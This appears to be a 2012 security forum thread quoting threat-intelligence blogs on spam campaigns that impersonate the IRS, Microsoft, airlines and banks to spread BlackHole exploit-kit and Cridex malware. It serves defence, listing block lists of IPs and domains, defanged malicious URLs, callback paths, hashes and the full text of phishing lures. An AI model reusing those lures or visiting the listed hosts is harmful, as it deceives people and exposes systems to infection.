Nov 15, 2012 - "Cybercriminals are currently spamvertising millions of emails impersonating the Better Business Bureau (BBB), in an attempt to trick users into clicking on a link to a non-existent report. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/better_business_bureau_email_spam_exploits_malware.png
... Although I wasn’t able to obtain the actual malicious payload from this campaign, it’s worth pointing out that the cybercriminals behind it relied on the same infrastructure as they did in previously profiled malicious attacks launched by the same party. We also know that on the following dates/specific time, the following malicious URLs also responded to the same IP (183.81.133.121):
2012-10-16 00:24:08 – hxxp ://navisiteseparation .net/detects/processing-details_requested.php
2012-10-12 11:19:37 – hxxp ://editdvsyourself .net/detects/beeweek_status-check.php
Responding to the same IP (183.81.133.121) are also the following malicious domains:
stafffire .net
hotsecrete .net - Email: counseling1 @ yahoo .com
the-mesgate .net - also responds to 208.91.197.54 – Email: admin @ newvcorp .com
Name servers used in the campaign:
Name Server: NS1.TOPPAUDIO .COM - 91.216.93.61 – Email: windowclouse @ hotmail .com
Name Server: NS2.TOPPAUDIO .COM - 29.217.45.138 – Email: windowclouse @ hotmail .com ..."
___
Changelog SPAM / feronialopam .ru
- http://blog.dynamoo.com/2012/11/changelog-spam-feronialopamru.html
15 Nov 2012 - "This fake "Changelog" spam leads to malware on feronialopam .ru:
Date: Thu, 15 Nov 2012 10:43:59 +0300
From: "Xanga" [noreply@xanga.com]
Subject: Re: Changelog 2011 update
Attachments: changelog-12.htm
Hello,
as promised chnglog attached (Internet Explorer File)
==========
Date: Thu, 15 Nov 2012 05:43:09 -0500
From: Chaz Shea via LinkedIn [member@linkedin.com]
Subject: Re: Changelog as promised(updated)
Attachments: Changelog-12.htm
Hello,
as prmised changelog is attached (Internet Explorer File)
The malicious payload is at [donotclick]feronialopam .ru:8080/forum/links/column.php hosted on a familiar looking bunch of IP addresses that you really should block:
120.138.20.54 (Sitehost, New Zealand)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)..."
:mad:
AplusWebMaster
2012-11-16, 13:43
FYI...
Malware sites to block - 16/11/12
- http://blog.dynamoo.com/2012/11/malware-sites-to-block-161112.html
16 Nov 2012 - "Some more evil domains and IPs, connected with this spam run*. (Thanks, GFI)
* http://gfisoftware.tumblr.com/post/35789134771/american-express-online-merchant-system-spam
chelseafun .net
cosmic-calls .net
dirtysludz .com
fixedmib .net
packleadingjacket .org
performingandroidtoios .info
65.131.100.90
75.127.15.39
82.145.36.69
108.171.243.172
218.102.23.220 ..."
___
Bogus eFax Corporate messages serve multiple malware variants
- http://blog.webroot.com/2012/11/16/cybercriminals-spamvertise-bogus-efax-corporate-delivery-messages-serve-multiple-malware-variants/
Nov 16, 2012 - "... mass mailing millions of emails trying to trick recipients into executing malicious attachments pitched as recently arrived fax messages. Upon running the malicious executables, users are exposed to a variety of dropped malware variants in a clear attempt by the cybercriminals to add additional layers of monetization to the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/efax_corporate_email_spam_malware.png
Detection rate for the malicious executable: MD5: 16625f5ee30ba33945b807fb0b8b2f9e * ... Trojan-PSW.Win32.Tepfer.blbl
Upon execution, it attempts to connect to the following domains:
192.5.5.241
ser.foryourcatonly .com
ser.luckypetspetsitting .com
dechotheband .gr
barisdogalurunler .com
alpertarimurunleri .com
oneglobalexchange .com
rumanas .org
www .10130138 .wavelearn .de
visiosofttechnologies .com
sgisolution.com .br
plusloinart .be
marengoit .pl
It then downloads additional malicious payload...
Phone back URL:
hxxp ://oftechnologies.co .in/update/777/img.php?gimmeImg – 130.185.73.102, AS48434 ** – Email: melody_mccarroll38 @ indyracers .com
Name Server:NS1.INVITEDNS .COM
Name Server:NS2.INVITEDNS .COM
The following malicious domain responds to the same IP: updateswindowspc .net
The following malicious domains are also known to have responded to the same IP (130.185.73.102) in the past..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/755d3ccd26b99ae2ccae8483847a2e42f8756884e1f11eb05d637d383d90362f/analysis/1352078183/
File name: eFAX.CORPORATE.exe
Detection ratio: 37/43
Analysis date: 2012-11-05
** https://www.google.com/safebrowsing/diagnostic?site=AS:48434
Diagnostic page for AS48434 (TEBYAN) - "Of the 1723 site(s) we tested on this network over the past 90 days, 86 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-11-16, and the last time suspicious content was found was on 2012-11-16... Over the past 90 days, we found 2 site(s) on this network... that appeared to function as intermediaries for the infection of 5 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 5 site(s)... that infected 6 other site(s)..."
:mad: :fear:
AplusWebMaster
2012-11-17, 21:46
FYI...
Fake J. dee Edwards / jdeeedwards .com scam
- http://blog.dynamoo.com/2012/11/j-dee-edwards-jdeeedwardscom-scam.html
17 Nov 2012 - "I'm not even certain what this scam is, but this is certainly not legitimate:
From: J. dee Edwards j.edwards @ jdeeedwards .com
Reply-To: j.edwards @ jdeeedwards .com
Date: 17 November 2012 16:29
Subject: Edwards contact
Dear Colleague,
We are working with healthcare market companies which would like to hear your opinion.
We would like you to become a member of working group and share your opinion online. Please review your full name, specialty, country and language by clicking on the link http ://www .jdeeedwards .com/contact.php?e=[redacted] or replying to the email.
Thank you for your time.
J. dee Edwards HRms
j.edwards @ jdeeedwards .com
http ://www .jdeeedwards .com
To ensure that our emails reach you, please remember to add j.edwards @ jdeeedwards .com to your email address book.
We would like to remind you that J. dee Edwards is committed to safeguarding your privacy and your personal details will not be disclosed to third parties.
If you do not wish to receive please visit: http ://jdeeedwards .com/ unsub.php?e=[redacted]
Copyright 2012 - J. dee Edwards - 20 Broadwick Street London, UK
Firstly, the email is sent to an address that ONLY spammers use, which is not a good sign. Secondly, the domain jdeeedwards .com has anonymous WHOIS details and was registered just over a month ago - the site is hosted on 54.247.87.188 (Amazon, Ireland) and looks like this:
> https://lh3.ggpht.com/-gF0CqXAXYUc/UKfWJw71UNI/AAAAAAAAAxs/HOmxzuXDSRk/s1600/jdeeedwards.png
... there used to be a company called JD Edwards, but there isn't any more**, nor is there a company called J. dee Edwards anywhere in the UK. The link in the email is some sort of signup thing, I guess it's the first part of a scam to recruit people for some sort of illegal activity.
> https://lh3.ggpht.com/-htRJx4tLeEA/UKfXPYlYHwI/AAAAAAAAAx0/6lokOiyIKrc/s400/jdeeedwards2.png
Oddly, the email address is an "optional" component, so how are they going to contact you? Maybe it's the tracking code in the link. Alternatively, you can reply by email and this is the third suspect thing, the mailserver is on 85.206.51.81 in Lithunia (AS8764 / LIETUVOS-TELEKOMAS). AS8764* is a pretty scummy netblock according to Google*. 85.206.51.81 is also the IP address the spam was sent from. So, a non-existent company with a month-old domain sends an email to an address only spammers use, from an email server in a dodgy part of cyberspace. Whatever this is, it is some sort of scam and is definitely best avoided."
* http://www.google.com/safebrowsing/diagnostic?site=AS:8764
** https://en.wikipedia.org/wiki/JD_Edwards
"... JD Edwards, abbreviated JDE, -was- an Enterprise Resource Planning (ERP) software company..."
:mad:
AplusWebMaster
2012-11-19, 14:18
FYI...
Fake IRS "W-1" SPAM / 5.chinottoneri .com
- http://blog.dynamoo.com/2012/11/w-1-spam-5chinottonericom.html
19 Nov 2012 - "This is a new one, pretending to be from the victim's HR department with tailored fake links in the email that look like they are going to the victim's own domain. Of course, floating over the links reveals that they point to some other domain entirely. A W-1 form is a tax form of some sort from the US Internal Revenue Service.
From: Administrator [mailto:administrator @ victimdomain .com]
Sent: 19 November 2012 14:50
Subject: To All Employee's - Important Address UPDATE
To All Employee's:
The end of the year is approaching and we want to ensure every employee receives their W-1 to the correct address.
Verify that the address is correct - https ://local .victimdomain .com/details.aspx?id=[redacted]
If changes need to be made, contact HR at https ://hr.victimdomain .com/update.aspx?id=[redacted].
Administrator,
http ://victimdomain .com
In this case, the link bounces through two hacked legitimate sites to end up at [donotclick]5.chinottoneri .com/links/landing-philosophy_dry-suspende.php hosted on 50.61.155.86 (Fortress ITX, US). VirusTotal detections are pretty low*. I suspect that there are many other malicious sites on this IP, blocking it would be wise."
* https://www.virustotal.com/file/825407bd62793a320d9e573f03b70a069a6f2265e95935d3a264f3487e990e6b/analysis/1353338928/
File name: exploit.htm
Detection ratio: 3/43
Analysis date: 2012-11-19
___
Bogus IRS emails lead to malware
- http://blog.webroot.com/2012/11/19/bogus-irs-your-tax-return-appeal-is-declined-themed-emails-lead-to-malware/
Nov 19, 2012 - "In March 2012, we intercepted an IRS themed malicious campaign that was serving client-side exploits to prospective users in an attempt to drop malware on the affected hosts. This week, we intercepted three consecutive campaigns using the exact same email template used in the March campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/irs_email_spam_tax_appeal_malware.png
Unlike March 2012's campaign that used client-side exploits in an attempt to drop malware on the affected host, the last three campaigns have relied on malicious archives attached to spamvertised emails. Each has a unique MD5 and phones back to a different (compromised) command and control server.
The first sample: MD5: f56026fcc9ac2daad210da82d92f57a3 * ... Worm:Win32/Cridex.E phones back to 210.56.23.100 :8080/Ajtw/UCygrDAA/Ud+asDAA (AS7590, Commission For Science And Technology, Pakistan).
We also have another: MD5: 532bdd2565cae7b84cb26e4cf02f42a0 ** Worm:Win32/Cridex.E that is known to have phoned back to the same IP, 128.2.172.202 :8080/37ugtbaaaaa/enmtzaaaaa/pxos/
The following MD5s are also known to have phoned back to this very same IP:
MD5: a5c8fb478ff7788609863b83079718ec ... Worm:Win32/Cridex.E
MD5: f739f99f978290f5fc9a812f2a559bbb ... Trojan.Win32.Bublik.swr
The third sample used in the IRS themed campaign: MD5: 32b4227ae379f98c1581f5cb2b184412 *** ... Worm:Win32/Cridex.E phones back to 202.143.189.180 :8080/Ajtw/UCygrDAA/Ud+asDAA (AS23974, Ministry of education, Thailand)..."
* https://www.virustotal.com/file/41886186a4d98044cc7f5592e56d98e4dbef8a319f1ec722f55e8c90d2327d5f/analysis/1352985385/
File name: IRS_Letter.exe
Detection ratio: 36/44
Analysis date: 2012-11-15
** https://www.virustotal.com/file/4c22bbf59405ef0a22b41f4bd03461ef95a292ef2103ff91c575a59710157287/analysis/1352985520/
File name: IRS_Rejected.exe
Detection ratio: 35/44
Analysis date: 2012-11-15
*** https://www.virustotal.com/file/e72bbfd2cf1994b326890321f76c8cc6f35472689c20aace4991580d9b669cf5/analysis/1352985751/
File name: IRS-AppID.exe
Detection ratio: 36/44
Analysis date: 2012-11-15
___
Fake "Southwest Airlines" SPAM / headerandfooterprebuilt .pro
- http://blog.dynamoo.com/2012/11/southwest-airlines-spam.html
19 Nov 2012 - "This fake Southwest Airlines spam leads to malware at headerandfooterprebuilt .pro:
Date: Mon, 19 Nov 2012 19:33:04 +0000
From: "Southwest Airlines" [no-reply @luv .southwest .com]
To: [redacted]
Subject: Southwest Airlines Confirmation: 5927NI
[redacted] 2012-11-19 86KY9Z INITIAL SLC WN PHX0.00T/TFF 0.00 END AY3.50$SLC2.50 1445164773311 2013-11-22 1655 2012-11-20 Depart SAN LEONARD CITY UT (SLC) at 8:08 PM on Southwest Airlines Arrive in PHOENIX AZ (PHX) at 9:02 PM
You're all set for your traveling!
My Account | Review My Itinerary Online
Check Up Online | Check Flight Status | Change Flight | Special Offers | Hotel Deals | Car Deals
Ready for lift-off!
Thanks Southwest for your travel! You can find everything you need to know about your booking below. Happy voyage!
Upcoming Cruise: 11/20/12 - SLC - Phx Knight
The malicious payload is at [donotclick]headerandfooterprebuilt .pro/detects/quality_flyes-ticket_check.php hosted on 198.27.94.80 (OVH, US). There are probably other Bad Things on that IP address, I just can't see them yet.. blocking it would be a good precaution."
___
Fake "End of Aug. Statement Reqiured" SPAM / bamanaco .ru
- http://blog.dynamoo.com/2012/11/end-of-aug-statement-reqiured-spam.html
19 Nov 2012 - "This spam leads to malware on bamanaco .ru:
Date: Mon, 19 Nov 2012 03:55:08 -0500
From: ups [admin@ups.com]
Subject: Re: FW: End of Aug. Statement Reqiured << sp?
Attachments: Invoices-1119-2012.htm
Hallo,
as reqeusted I give you inovices issued to you per oct. 2012 ( Internet Explorer/Mozilla Firefox file)
Regards
The malicious payload is at [donotclick]bamanaco .ru:8080/forum/links/column.php hosted on the following IPs:
203.80.16.81 (MYREN, Malaysia)
216.24.196.66 (Psychz Networks, US)
These IPs have been used to deliver malware several times recently, you should block access to them if you can."
___
Rolex SPAM rolls out in time for Black Friday
- http://www.gfi.com/blog/rolex-spam-rolls-out-in-time-for-black-friday/
Nov 19, 2012 - "... no surprise that online shenanigans abound when big holidays and major events are just around the corner. What remains to be seen are the forms of these shenanigans we ought to expect to see online and in our inboxes. This Thanksgiving and Black Friday week, cyber criminals did not disappoint. We found this particular email spam in user inboxes these last few days:
> http://www.gfi.com/blog/wp-content/uploads/2012/11/rolex-email-231x300.png
From: Designer Watches by LR (could be random, too)
To: {random}
Subject: Start Black Friday today
Message body:
BLACK FRIDAY EVERY DAY UNTIL NOVEMBER 23RD!
The best quality watch replicas on PLANET EARTH!
The lowest priced high-end watches on the PLANET!
www(dot)LRblackfridaytoday(dot)com
BLACK FRIDAY HAS STARTED!
Black Friday every day until November 23!
All items reduced by 25-50% as of TODAY.
Over 25,000 exact watch-copies have been reduced until Friday November 23rd.
There plenty of time to get the watch of your dreams but we recommend doing it as soon as possible.
This will ensure INSTOCK availability and fast delivery.
NOTE: BLACK FRIDAY PRICES ARE AVAILABLE ON INSTOCK ITEMS ONLY!
Currently every watch model is INSTOCK and ready to ship within 1 hour.
THESE ARE NOT CHEAP CHINA STOCK KNOCK-OFFS:
These are hand crafted high-end watch-copies.
These are made using identical parts and materials.
These are tested inside and out to be identical.
There is no difference between our watch-copies and the originals!
www(dot)LRblackfridaytoday(dot)com
Clicking either the image or the URLs on the email body leads users to the LRblackfridaytoday domain, which looks like this:
> http://www.gfi.com/blog/wp-content/uploads/2012/11/rolex-replica-300x274.png
The domain resolves to an IP in the Czech Republic that does not only have a bad reputation but also uses a network that Google* warned us about. Our friends at Symantec** have also mentioned several variants of this spam mail (and published other Black Friday-related threats) that you might want to check out, too. Fake Rolex replica spammers, like fake pharma scammers, promise little luxuries but often never deliver. Giving out your credit card information to spammed sites is a sure way of putting yourself in potential debt with no “luxury replica item” in return..."
* http://www.google.com/safebrowsing/diagnostic?site=AS:6830
** http://www.symantec.com/connect/blogs/thanksgiving-black-friday-spammers-radar
___
More here (also links to Screenshots):
- http://www.gfi.com/blog/gfi-labs-email-roundup-for-the-week-3/
Nov 19, 2012
:mad:
AplusWebMaster
2012-11-20, 15:17
FYI...
Malware sites to block 20/11/12
- http://blog.dynamoo.com/2012/11/malware-sites-to-block-201112.html
20 Nov 2012 - "This huge pile of malware sites and IPs is connected with these malicious emails being distributed in the Netherlands. All the sites are interconnected through their black hat infrastructure and are either being used for malware distribution or some other evil activity:
5.39.8.105 (OVH, Ireland)
46.249.38.27 (Hotkey, Russia)
62.109.31.36 (TheFirst, Russia)
64.79.64.170 (XLHost, US)
78.46.198.143 (GPI Holding,US)
78.110.61.186 (Hosting Telesystems, Russia)
91.220.35.42 (Zamahost, Russia)
91.220.35.74 (Zamahost, Russia)
91.231.156.55 (Sevzapkanat-Unimars, Russia)
93.174.90.81 (Ecatel, Netherlands)
95.211.9.46 (Leaseweb, Netherlands)
95.211.9.55 (Leaseweb, Netherlands)
149.154.67.103 (TheFirst, Russia)
176.9.179.170 (Siteko, Russia)
178.63.226.203 (Avist, Russia)
178.63.247.189 (GPI Holding,US)
178.162.134.205 (AlfaInternet, Russia)
184.82.101.52 (HostNOC, US)
193.161.86.43 (Host-Telecom, Czech Republic)
194.62.233.19 (Stils-Grupp, Russia)
198.23.139.199 (Chicago VPS, US)
208.88.226.231 (WZ Communications, US)
If you want to block those Russian hosts more widely, perhaps use the following list:
46.249.38.0/24
62.109.28.0/22
64.79.64.170
78.46.198.136/29
78.110.61.186
91.220.35.0/24
91.231.156.0/24
93.174.90.81
95.211.9.46
95.211.9.55
149.154.66.0/23
176.9.179.128/26
178.63.226.192/26
178.63.247.128/26
178.162.134.192/26
184.82.101.52
193.161.86.43
194.62.233.0/24
198.23.139.199 ...
(More detail at the dynamoo URL above.)
___
Fake "Don't forget about meeting tomorrow" SPAM / hamasutra .ru
- http://blog.dynamoo.com/2012/11/dont-forget-about-meeting-tomorrow-spam.html
20 Nov 2012 - "This spam leads to malware on hamasutra .ru:
From: Lula Stevens [... JolieWright @ shaw .ca]
Sent: 20 November 2012 05:57
Subject: Don't forget about meeting tomorrow
Don't forget this report for meeting tomorrow.
See attached file. (Internet Explorer file)
In the sample I have seen, there is an attachment called Report.htm with some obfuscated javascript leading to a malicious payload at [donotclick]hamasutra .ru:8080/forum/links/column.php hosted on the following IPs:
82.165.193.26 (1&1, Germany)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
216.24.196.66 (Psychz Networks, US)
Plain list:
82.165.193.26
202.180.221.186
203.80.16.81
216.24.196.66
___
Fake ‘Copies of Missing EPLI Policies’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/20/copies-of-missing-epli-policies-themed-emails-lead-to-black-hole-exploit-kit/
Nov 20, 2012 - "Attempting to achieve a higher click-through rate for their exploits and malware serving malicious campaign, cybercriminals are currently spamvertising millions of emails attempting to trick users into thinking they’ve become part of a private conversation about missing EPLI policies (Employment practices liability). In reality, clicking on any of the links in the oddly formulated email will expose them to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/missing_epli_policies_email_spam_exploits_malware.png
... Sample client-side exploits serving URL: hxxp ://monacofrm.ru :8080/forum/links/column.php
Malicious domain name reconnaissance:
monacofrm .ru – 202.180.221.186, AS24496; 203.80.16.81, AS24514; 216.24.194.66, AS40676
Name server: ns1.monacofrm .ru – 62.76.178.233
Name server: ns2.monacofrm .ru – 41.168.5.140
Name server: ns3.monacofrm .ru – 132.248.49.112
Name server: ns4.monacofrm .ru – 209.51.221.247 ...
We also know is that on 2012-11-12 10:58:07, the following client-side exploits serving domain was also responding to the same IP (202.180.221.186) - hxxp ://canadianpanakota .ru:8080/forum/links/column.php. Upon successful client-side exploitation, this URL dropped MD5: 532bdd2565cae7b84cb26e4cf02f42a0 * ... Worm:Win32/Cridex.E.
We’re also aware of two more client-side exploits serving domains responding to the same IP (202.180.221.186) on 2012-11-15 19:49:33 – hxxp ://investomanio .ru/forum/links/public_version.php, and on the 2012-11-15 04:40:06 – hxxp ://veneziolo .ru/forum/links/column.php...
* https://www.virustotal.com/file/a0703de85f59b501935eff571a6c6b6f9e30c03c703a678abe699019e2c1eb2b/analysis/
File name: contacts.exe.x-msdownload
Detection ratio: 33/44
Analysis date: 2012-11-13
(More detail at the webroot URL above.)
:mad: :mad: :fear:
AplusWebMaster
2012-11-21, 01:10
FYI...
Linux Rootkit doing iFrame Injections
- https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
Nov 19, 2012 - "... an interesting piece of Linux malware came up on the Full Disclosure mailing-list*... not only because it targets 64-bit Linux platforms and uses advanced techniques to hide itself, but primarily because of the unusual functionality of infecting the websites hosted on attacked HTTP server - and therefore working as a part of drive-by download scenario... The malware module was specially designed for the kernel version 2.6.32-5-amd64, which happens to be the latest kernel used in 64-bit Debian Squeezy. The binary is more than 500k, but its size is due to the fact that it hasn't been stripped (i.e. it was compiled with the debugging information). Perhaps it's still in the development stage, because some of the functions don’t seem to be fully working or they are not fully implemented yet. The malware ensures its startup by adding an entry to the /etc/rc.local script... Then it extracts the memory addresses of several kernel functions and variables and stores them in the memory for the later use... the malicious iFrames are injected into the HTTP traffic by direct modification of the outgoing TCP packets... In order to obtain the actual injection payload, the malware connects to the C&C server using an encrypted password for authentication... the malicious server is still active and it hosts other *NIX based tools, such as log cleaners... So far, in most of the drive-by download scenarios an automated injection mechanism is implemented as a simple PHP script. In the case described above, we are dealing with something far more sophisticated - a kernel-mode binary component that uses advanced hooking techniques to ensure that the injection process is more transparent and low-level than ever before. This rootkit, though it's still in the development stage, shows a new approach to the drive-by download schema and we can certainly expect more such malware in the future. An excellent, detailed analysis of this rootkit was recently posted on CrowdStrike blog**."
* http://seclists.org/fulldisclosure/2012/Nov/94
** http://blog.crowdstrike.com/2012/11/http-iframe-injecting-linux-rootkit.html
___
- http://h-online.com/-1753969
21 Nov 2012
___
- http://atlas.arbor.net/briefs/index#2007317889
64-bit Linux Rootkit Doing iFrame Injections
Nov 20, 2012
New development on a Linux-based rootkit shows increased attention from cybercriminals.
Analysis: It's been a while since public linux rootkit activity has raised much attention. This particular rootkit is poorly designed however is/was effective at delivering malicious links to website visitors, it's primary goal. Several write-ups on the threat exist, including a post to the Full-Disclosure list, the Kapsersky blog and the CrowdStrike blog to provide plenty of analysis material to help admins detect this threat. Arbor is interested to hear if any customers have found this threat on their hosting platforms.
Source: http://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
:mad:
AplusWebMaster
2012-11-21, 15:58
FYI...
Bogus ‘MS License Orders’ serve client-side exploits and malware
- http://blog.webroot.com/2012/11/21/cybercriminals-spamvertise-bogus-microsoft-license-orders-serve-client-side-exploits-and-malware/
Nov 21, 2012 - "Cybercriminals are currently mass mailing millions of emails impersonating Microsoft Corporation in an attempt to trick users into clicking on a link in a -bogus- ‘License Order” confirmation email. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/microsoft_windows_email_spam_exploits_malware.png
... Sample client-side exploit served: CVE-2010-0188
Malicious domain name reconnaissance:
fidelocastroo .ru – 209.51.221.247; 203.80.16.81
Name server: ns1.fidelocastroo .ru – 85.143.166.170
Name server: ns2.fidelocastroo .ru – 132.248.49.112
Name server: ns3.fidelocastroo .ru – 84.22.100.108
Name server: ns4.fidelocastroo .ru – 213.251.171.30 ...
(Full detail available at the webroot URL above.)
___
5.estasiatica .com / 66.228.57.248
- http://blog.dynamoo.com/2012/11/5estasiaticacom-6622857248.html
20 Nov 2012 - "It looks like another variant of this* malicious spam run could be brewing on 5.estasiatica .com / 66.228.57.248 (Linode, US). A bit of pre-emptive blocking might be in order..."
* http://blog.dynamoo.com/2012/11/w-1-spam-5chinottonericom.html
:mad:
AplusWebMaster
2012-11-22, 13:02
FYI...
Fake ‘Payroll Account Cancelled by Intuit’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/22/cybercriminals-resume-spamvertising-payroll-account-cancelled-by-intuit-themed-emails-serve-client-side-exploits-and-malware/
Nov 22, 2012 - "Cybercriminals have resumed spamvertising the Intuit Direct Deposit Service Informer themed malicious emails, which we intercepted and profiled earlier this month. While using an identical email template, the cybercriminals behind the campaign have introduced new client-side exploits serving domains, which ultimately lead to the latest version of the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/intuit_direct_deposit_service_email_spam_exploits_malware_01.png
... Sample client-side exploits served: CVE-2010-0188
Malicious domain name reconnaissance:
cosmic-calls .net – 108.171.243.172, AS40676 – Email: samyidea @aol .com, used to respond to 75.127.15.39
108.171.243.172 also resolves to lanthaps .com (used to respond to 199.167.31.121) – Email: A1kmmm @ gmail .com
Name Server: NS1.CHELSEAFUN .NET
Name Server: NS2.CHELSEAFUN .NET
... Upon successful client-side exploitation, the campaign drops MD5: 896bae2880071c3a63d659a157d5c16f * ... Worm:Win32/Cridex.E.
Upon execution, the sample phones back to hxxp ://203.172.238.18 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/ (AS23974, Ministry of Education, Thailand). The following domain has also responded to this IP in the past: phnomrung .com (Name server: ns1 .banbu.ac .th – currently responding to 208.91.197.101)...
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/cf4a54984edb86bec14f7909ae88076b68864148e47c32903dd4afaccb34871a/analysis/
File name: 896bae2880071c3a63d659a157d
Detection ratio: 33/44
Analysis date: 2012-11-17
___
Malware sites to block 22/11/12
- http://blog.dynamoo.com/2012/11/malware-sites-to-block-221112.html
22 Nov 2012 - "This is part of a cluster of malware sites being promoted through finance related spam, spotted by GFI Labs here* and on this blog here**.
* http://gfisoftware.tumblr.com/post/36222532206/key-bank-secure-message-spam
** http://blog.dynamoo.com/2012/11/w-1-spam-5chinottonericom.html
50.61.155.86 (Fortress ITX,US)
69.194.196.5 (Solar VPS, US)
70.42.74.152 (Nuclear Fallout Enterprises, US)
173.246.103.112 (Gandi, US)
192.155.83.186 (Linode, US)
192.155.83.191 (Linode, US)
198.74.53.207 (Linode, US)
Plain list of IPs and domains for copy-and-pasting:
5.estasiatica .com
5.chinottoneri .com
6.grapainterfood .com
6.grapaimport .com
6.grapafood .com
6.pascesoir .net
50.61.155.86
69.194.196.5
70.42.74.152
173.246.103.112
192.155.83.186
192.155.83.191
198.74.53.207 ..."
___
Facebook SPAM / ceredinopl .ru
- http://blog.dynamoo.com/2012/11/facebook-spam-ceredinoplru.html
22 Nov 2012 - "This fake Facebook (or is it Habbo?) spam leads to malware on ceredinopl .ru:
Date: Thu, 22 Nov 2012 01:30:38 -0700
From: Habbo Hotel [auto-contact @ habbo .com]
Subject: You have notifications pending
facebook
Hi,
Here's some activity you may have missed on Facebook.
REFUGIA MERRILL has posted statuses, photos and more on Facebook.
Go To Facebook
See All Notifications
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
The malicious payload is at [donotclick]ceredinopl .ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)
216.24.196.66 (Psychz Networks, US)
The following IPs and domains are all connected:
202.180.221.186
203.80.16.81
208.87.243.131
216.24.196.66
ceredinopl .ru
investinindia .ru
hamasutra .ru
feronialopam .ru
monacofrm .ru
bamanaco .ru
ionalio .ru
investomanio .ru
veneziolo .ru
fanatiaono .ru
analunakis .ru ..."
:mad:
AplusWebMaster
2012-11-23, 14:37
FYI...
Malware sites to block 23/11/12
- http://blog.dynamoo.com/2012/11/malware-sites-to-block-231112.html
23 November 2012 - "This bunch of IPs and domains are being used in a series of fairly well-targeted attacks involving malicious spam messages that look like they come from real financial organisations (such as this one*). The payload is apparently "Ponyloader".
* http://blog.dynamoo.com/2012/11/w-1-spam-5chinottonericom.html
The domains seem to be legitimate but hacked, and in some cases the server infrastructure also looks like it is something legitimate that has been taken over by the bad guys. However, the chances are that you are more likely to see these sites as the result of a malicious spam run rather than anything else, and you should consider blocking them...
Plain list of IPs for copy-and-pasting:
50.116.16.118
64.94.101.200
69.194.194.216
70.42.74.152
94.76.235.199
173.246.103.59
173.246.103.112
173.246.103.124
173.246.103.184
173.246.104.21
174.140.168.143
198.74.52.86
209.188.0.118 ..."
(More detail at the dynamoo URL above.)
___
Malware sites to (block) 23/11/12 - Part 2
- http://blog.dynamoo.com/2012/11/malware-sites-to-blog-231112-part-2.html
23 November 2012 - "Some more bad domains, closely related to this malicious spam run, spotted at the GFI blog*, hosted on 192.155.83.191 (Linode, US)
* http://gfisoftware.tumblr.com/post/36352406093/comerica-bank-secure-message-spam
192.155.83.191
5.estasiatica .com
5.finesettimana .com
5.italycook .com
5.hdsfm .com
5.eventiduepuntozero .com
5.finesettimana .net ..."
___
An Overview of Exploit Packs (kits)...
- http://contagiodump.blogspot.de/2010/06/overview-of-exploit-packs-update.html
"... Updates/new entries for 13 packs have been added (see exploit listing)..."
CVE's also listed.
____
Bogus Tsunami Warning leads to Arcom RAT
- http://blog.trendmicro.com/trendlabs-security-intelligence/tsunami-warning-leads-to-arcom-rat/
Nov 23, 2012 - "... the website “Hoax Slayer”* pointed us to a spammed email message that warns users of a Tsunami and encourages them to click on a link to watch a video. The article, which the cybercriminals made to look like it came from “news.com.au”, claims that experts have predicted that a Tsunami will hit Australia on New Year’s Eve...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/11/htmlcontent_spam.jpg
The “watch now” link connects to {BLOCKED}be.us and downloads a file that pretends to be an AVI in a ZIP archive. In actual, “sunami_australian_agency_of_volcanology_and_seismology.avi.pif is a malicious file which Trend Micro detects as BKDR_DOKSTORMC.A... It remains unclear who is behind the attack and what the motivation may be... The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00... There are also free cracked versions available for download from a variety of sources. Arcom RAT was reportedly authored by “princeali” who has been actively coding RATs and malware for about a decade. The alias “princeali” is connected to a group known as NuclearWinterCrew which created the infamous NuclearRAT..."
* http://www.hoax-slayer.com/tsunami-warning-malware.shtml
Nov 19, 2012
___
Bogus Prize Offers on Facebook - 'Like and Share To Win'
- http://www.hoax-slayer.com/facebook-share-win.shtml
Nov 22, 2012 - "Outline: Various messages distributed on Facebook claim that users can win expensive prizes such as Apple products or designer headphones just by liking and sharing a Facebook Page.
Analysis: A great many of these supposed prize offers are totally bogus. The "promotions" are created primarily to artificially inflate the number of "likes" gained by the offending Facebook Page and to promote the page further by way of shared posts and images. Those who participate will -never- receive the promised prize. In some cases, the perpetrators of these fake promotions may also try to trick people into divulging their personal information... don't give these unscrupulous people what they want! Don't "like" their bogus Pages. Don't be tricked into spamming your friends with their fake promotions by sharing their pictures. Do not send your personal information to these people in the vain hope of winning a prize. Before entering any type of promotion or prize draw always take a closer look. If it seems suspect or dodgy, give it a miss."
___
Some evil on 5.135.192.16/30
- http://blog.dynamoo.com/2012/11/some-evil-on-51351921630.html
